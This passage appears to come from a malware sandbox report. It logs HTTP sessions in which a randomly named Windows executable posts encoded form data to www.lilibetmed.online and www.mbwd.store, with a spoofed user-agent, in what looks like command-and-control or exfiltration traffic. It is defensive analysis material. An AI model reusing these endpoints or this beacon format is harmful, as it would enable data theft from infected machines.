
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          25192.168.2.456254185.134.245.113804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:22.863348961 CEST782OUTPOST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 62 34 68 53 32 37 42 63 42 31 7a 37 4d 52 4e 69 4b 6f 32 54 6f 65 45 38 4d 37 61 4f 4d 47 6c 73 30 69 4b 53 66 47 78 6b 2f 36 6a 56 69 6d 44 67 2f 67 79 35 4b 72 44 6b 45 73 74 35 57 47 48 78 79 4c 48 64 2f 5a 52 4e 43 63 44 79 72 53 63 78 4c 63 78 64 68 73 6a 74 6a 57 6b 53 48 77 5a 75 30 53 31 51 77 56 4a 6b 50 6d 49 53 38 51 4f 50 75 72 36 6b 53 78 61 58 57 6c 79 56 76 4c 56 31 58 35 61 77 5a 43 66 53 4a 6d 44 4d 51 43 77 53 2b 63 67 48 7a 58 2f 58 6f 55 49 4c 72 69 70 4c 30 46 66 31 71 43 37 6b 75 35 51 6e 73 62 71 6d 2b 33 4d 6e 42 41 3d 3d
                                          Data Ascii: dxWljT6=OTKrJrPoX9Ljb4hS27BcB1z7MRNiKo2ToeE8M7aOMGls0iKSfGxk/6jVimDg/gy5KrDkEst5WGHxyLHd/ZRNCcDyrScxLcxdhsjtjWkSHwZu0S1QwVJkPmIS8QOPur6kSxaXWlyVvLV1X5awZCfSJmDMQCwS+cgHzX/XoUILripL0Ff1qC7ku5Qnsbqm+3MnBA==
                                          Sep 7, 2024 21:45:23.570417881 CEST716INHTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          26192.168.2.456255185.134.245.113804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:25.416908979 CEST802OUTPOST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 59 62 35 53 31 63 31 63 48 56 7a 34 51 42 4e 69 44 49 32 58 6f 65 34 38 4d 36 75 65 4d 51 31 73 30 47 4f 53 63 45 5a 6b 34 36 6a 56 71 47 44 6c 69 51 79 79 4b 72 4f 5a 45 75 35 35 57 47 54 78 79 4b 33 64 2f 71 70 4f 44 4d 44 38 2b 43 63 7a 57 73 78 64 68 73 6a 74 6a 57 77 34 48 30 39 75 30 6a 46 51 7a 77 70 6c 52 32 49 52 35 67 4f 50 34 62 37 76 53 78 61 35 57 6b 65 72 76 4e 5a 31 58 38 2b 77 59 54 66 54 63 57 44 4f 50 53 78 61 35 63 55 43 2b 69 57 57 67 48 77 49 79 32 30 75 78 44 4f 76 37 7a 61 7a 38 35 30 55 78 63 6a 53 7a 30 78 75 61 43 4f 71 63 33 50 79 58 6b 5a 68 37 34 36 46 43 4b 54 58 44 79 45 3d
                                          Data Ascii: dxWljT6=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ1s0GOScEZk46jVqGDliQyyKrOZEu55WGTxyK3d/qpODMD8+CczWsxdhsjtjWw4H09u0jFQzwplR2IR5gOP4b7vSxa5WkervNZ1X8+wYTfTcWDOPSxa5cUC+iWWgHwIy20uxDOv7zaz850UxcjSz0xuaCOqc3PyXkZh746FCKTXDyE=
                                          Sep 7, 2024 21:45:26.060398102 CEST716INHTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          27192.168.2.456256185.134.245.113804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:27.962165117 CEST10884OUTPOST /3cch/ HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.lilibetmed.online
                                          Referer: http://www.lilibetmed.online/3cch/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 4f 54 4b 72 4a 72 50 6f 58 39 4c 6a 59 62 35 53 31 63 31 63 48 56 7a 34 51 42 4e 69 44 49 32 58 6f 65 34 38 4d 36 75 65 4d 51 39 73 30 56 57 53 65 6a 74 6b 35 36 6a 56 70 47 44 65 69 51 79 76 4b 72 58 53 45 75 46 50 57 45 72 78 78 73 6a 64 39 62 70 4f 4e 4d 44 38 6d 79 63 32 4c 63 78 49 68 74 54 58 6a 57 67 34 48 30 39 75 30 68 64 51 6e 56 4a 6c 54 32 49 53 38 51 4f 54 75 72 37 48 53 77 79 50 57 6b 72 51 76 39 35 31 55 63 4f 77 62 6c 7a 54 41 47 44 49 4f 53 77 63 35 63 4a 53 2b 6d 4f 67 67 47 46 74 79 78 63 75 38 47 54 57 68 6e 4b 6e 6f 49 73 59 6c 75 6d 6f 31 6d 56 67 65 67 57 4a 66 6c 65 74 54 32 64 70 38 37 62 7a 59 59 50 4f 66 48 4c 72 32 36 56 43 75 30 74 6b 65 57 2b 2b 66 4f 7a 58 30 50 31 65 4e 74 79 6d 32 35 77 50 52 47 64 53 44 49 59 42 48 51 41 31 52 37 50 71 54 73 73 6b 49 71 67 46 61 4f 53 61 79 32 6f 51 6e 6d 64 50 53 35 6a 74 34 32 68 50 43 30 6f 37 78 48 44 63 35 78 6d 67 65 58 39 38 33 73 50 44 45 6c 69 5a 55 69 30 54 30 5a 71 4c 52 49 33 72 4c 4b 56 64 30 6f [TRUNCATED]
                                          Data Ascii: dxWljT6=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ9s0VWSejtk56jVpGDeiQyvKrXSEuFPWErxxsjd9bpONMD8myc2LcxIhtTXjWg4H09u0hdQnVJlT2IS8QOTur7HSwyPWkrQv951UcOwblzTAGDIOSwc5cJS+mOggGFtyxcu8GTWhnKnoIsYlumo1mVgegWJfletT2dp87bzYYPOfHLr26VCu0tkeW++fOzX0P1eNtym25wPRGdSDIYBHQA1R7PqTsskIqgFaOSay2oQnmdPS5jt42hPC0o7xHDc5xmgeX983sPDEliZUi0T0ZqLRI3rLKVd0ogM1B72LmSXV6Ohor4X4qKOHoGsIrhw20EcJUJ0xFpQs7Rxvm2SoIgpfbok8GuSR/Dx1TYWUuI6+vYSZmTk65pmX1bIxqcWZ5X45mQ4DR2ILf9H8geec+6XnW2hYQZ2OOmC7n+LDqvkPAT+wIWRvav4GZLWlE0H8V40Ni6SO8qEp7+Kk4wz9d7Jl/J1re6NB+BxIUrZFS4ijcV2dY1nFUbPv1TcKmjRoH0E/njDLBsdMZwKXY6+upY/PaQtp6Cd8nfhj/cDdWp9f5qvhd8Kivc+mpEp8XnR4x9A8s5KWJ1eZ6grzVuBzmiKHyQCQtS1X8LSuibhoQ71IKP38TDtANHzWlKurfa1WkuYZ5/eMLPGnVknq3HSjpeHfoNAWTKmxHm2ZCAJzrVsKhklPct7EL50uKujkb1LD9NgWjAv1Bg8A3Fua5Qq2RTi+ZXqonhxq8qhGRoUPa5Ij80KLAvnGKN5JL2m/wVeg20ii26NRQ+IwfK5q1rGGdcQ5pV5BUjcY+mR64rWh8kSHfIk76L8hc2SvE7wIKwfLw1qe9y6wNAoofC+yfQVqbhetVmXSxeCpwxJFQXtQ4qzq4WLniHB4dAeVye1Af+tF0j1hxLHRE2lwGJWg3F1t6jXi3MFbEGadZQl7UkrTH0yA/mzSKK2hbQeS54JGzcLq3KW [TRUNCATED]
                                          Sep 7, 2024 21:45:28.586628914 CEST716INHTTP/1.1 405 Not Allowed
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                          Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.456257185.134.245.113804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:30.509696007 CEST506OUTGET /3cch/?GtLD=xFGdQ6FH&dxWljT6=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1
                                          Host: www.lilibetmed.online
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.5
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Sep 7, 2024 21:45:31.255739927 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sat, 07 Sep 2024 19:45:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Expires: Sat, 07 Sep 2024 20:45:31 GMT
                                          Cache-Control: max-age=3600
                                          Cache-Control: public
                                          Data Raw: 31 35 33 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 69 6c 69 62 65 74 6d 65 64 2e 6f 6e 6c 69 6e 65 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f [TRUNCATED]
                                          Data Ascii: 153f<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.lilibetmed.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.log
                                          Sep 7, 2024 21:45:31.255825043 CEST1236INData Raw: 6f 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20
                                          Data Ascii: o { width: auto; max-height: 50px; margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 1
                                          Sep 7, 2024 21:45:31.255845070 CEST1236INData Raw: 69 76 65 20 77 65 62 73 69 74 65 20 68 65 72 65 2e 20 3c 62 72 3e 4f 74 68 65 72 20 73 65 72 76 69 63 65 73 2c 20 73 75 63 68 20 61 73 20 65 2d 6d 61 69 6c 2c 20 6d 61 79 20 62 65 20 61 63 74 69 76 65 6c 79 20 75 73 65 64 20 62 79 20 74 68 65 20
                                          Data Ascii: ive website here. <br>Other services, such as e-mail, may be actively used by the owner.<br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.lilibetmed.online') + ' er registrert
                                          Sep 7, 2024 21:45:31.256377935 CEST1236INData Raw: 0a 0a 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 74 79 70 65 6f 66 20 53 56 47 52 65 63 74 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 3f 20 22 73 76 67 22 20 3a 20 22 70 6e 67 22 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 71 28 73
                                          Data Ascii: var i = typeof SVGRect != "undefined" ? "svg" : "png"; function q(s) { return document.getElementById(s); } </script> <div class="container"> <h1 id="t"> www.lilibetmed.online is park
                                          Sep 7, 2024 21:45:31.256390095 CEST766INData Raw: 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 66 6c 61 67 2d 65 6e 2e 70 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 45 6e 67 6c 69 73 68 22 0a 20 20 20 20 20 20 20 20 20 20 74 69 74 6c 65 3d 22 45
                                          Data Ascii: img src="/images/flag-en.png" alt="English" title="English" onclick="setLang('en')" /> </div> </div> <div class="footer"> <span >Domeneshop AS &copy; 2024</spa


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.456258103.42.108.46804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:36.620532990 CEST761OUTPOST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 33 46 52 4b 50 70 37 49 6f 67 4c 54 76 6e 7a 4a 69 58 64 4d 36 30 4e 62 32 42 66 4c 77 54 35 46 72 49 75 79 33 2f 4a 48 32 57 45 6f 45 68 55 4a 41 74 57 59 6f 4b 79 31 65 6c 31 6d 51 34 71 50 68 35 47 6b 77 58 32 57 71 42 76 51 38 2f 61 55 6b 6b 79 55 46 47 30 6a 5a 53 31 5a 59 69 53 32 47 64 54 76 49 53 59 6f 5a 61 38 4f 7a 2b 50 53 6e 36 73 34 69 75 30 61 59 53 75 46 31 6f 71 71 6d 55 4b 65 37 39 6c 44 69 6f 4c 31 65 66 4b 4a 79 46 30 76 48 38 62 7a 4f 34 33 64 57 79 56 5a 79 37 6a 4c 71 33 6d 6a 5a 36 48 34 6f 49 38 70 43 6d 69 76 75 77 3d 3d
                                          Data Ascii: dxWljT6=tIPs8k8l6Jqf3FRKPp7IogLTvnzJiXdM60Nb2BfLwT5FrIuy3/JH2WEoEhUJAtWYoKy1el1mQ4qPh5GkwX2WqBvQ8/aUkkyUFG0jZS1ZYiS2GdTvISYoZa8Oz+PSn6s4iu0aYSuF1oqqmUKe79lDioL1efKJyF0vH8bzO43dWyVZy7jLq3mjZ6H4oI8pCmivuw==
                                          Sep 7, 2024 21:45:37.494009972 CEST154INHTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:37 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.456259103.42.108.46804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:39.925390959 CEST781OUTPOST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 224
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                                          Data Raw: 64 78 57 6c 6a 54 36 3d 74 49 50 73 38 6b 38 6c 36 4a 71 66 6c 78 56 4b 63 2b 76 49 74 41 4c 63 7a 33 7a 4a 73 33 64 49 36 30 78 62 32 45 76 62 78 68 4e 46 72 71 6d 79 30 2b 4a 48 37 32 45 6f 50 42 55 47 64 64 57 6c 6f 4b 2b 54 65 67 56 6d 51 37 57 50 68 39 43 6b 78 67 61 58 70 78 76 4f 31 66 61 46 67 6b 79 55 46 47 30 6a 5a 53 67 45 59 69 4b 32 48 75 37 76 50 44 59 6e 46 4b 38 42 77 2b 50 53 31 4b 73 38 69 75 30 34 59 51 4b 72 31 71 53 71 6d 52 75 65 37 73 6c 4d 74 6f 4c 4a 61 66 4c 32 2b 30 52 47 42 64 7a 37 47 61 75 39 57 69 41 37 7a 39 79 52 37 47 48 30 4c 36 6a 4c 31 50 31 64 50 6c 66 6d 31 2f 4d 38 63 61 48 33 7a 35 4f 32 46 72 7a 37 6b 38 67 77 72 4c 34 3d
                                          Data Ascii: dxWljT6=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhNFrqmy0+JH72EoPBUGddWloK+TegVmQ7WPh9CkxgaXpxvO1faFgkyUFG0jZSgEYiK2Hu7vPDYnFK8Bw+PS1Ks8iu04YQKr1qSqmRue7slMtoLJafL2+0RGBdz7Gau9WiA7z9yR7GH0L6jL1P1dPlfm1/M8caH3z5O2Frz7k8gwrL4=
                                          Sep 7, 2024 21:45:40.787250996 CEST154INHTTP/1.1 403 Forbidden
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Sat, 07 Sep 2024 19:45:40 GMT
                                          Content-Length: 11
                                          Connection: close
                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                          Data Ascii: Bad Request


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.456260103.42.108.46804520C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 7, 2024 21:45:42.468739986 CEST10863OUTPOST /pn1r/ HTTP/1.1
                                          Host: www.mbwd.store
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.5
                                          Content-Length: 10304
                                          Connection: close
                                          Cache-Control: no-cache
                                          Content-Type: application/x-www-form-urlencoded
                                          Origin: http://www.mbwd.store
                                          Referer: http://www.mbwd.store/pn1r/
                                          User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
